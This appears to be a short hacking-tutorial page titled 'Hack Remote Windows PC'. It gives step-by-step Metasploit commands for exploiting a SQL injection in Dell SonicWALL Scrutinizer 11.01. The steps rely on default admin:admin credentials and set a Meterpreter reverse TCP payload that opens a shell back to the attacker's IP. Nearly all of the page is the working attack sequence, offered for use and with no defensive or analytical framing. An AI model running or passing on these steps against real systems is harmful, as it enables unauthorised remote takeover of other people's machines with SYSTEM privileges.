Hack Remote Windows PC using Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection

This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail parameter in exporters.php allows an attacker to write arbitrary files to the file system with an SQL Injection attack, and gain remote code execution under the context of SYSTEM for Windows, or as Apache for Linux. Authentication is required to exploit this vulnerability, but this module uses the default admin:admin credential.

Exploit Targets

Dell SonicWALL Scrutinizer 11.01

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set payload windows/meterpreter/reverse_tcp

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set lhost 192.168.0.108 (IP of Local Host)

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set rhost 192.168.0.120

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>exploit

Leave a Reply

Your email address will not be published. Required fields are marked *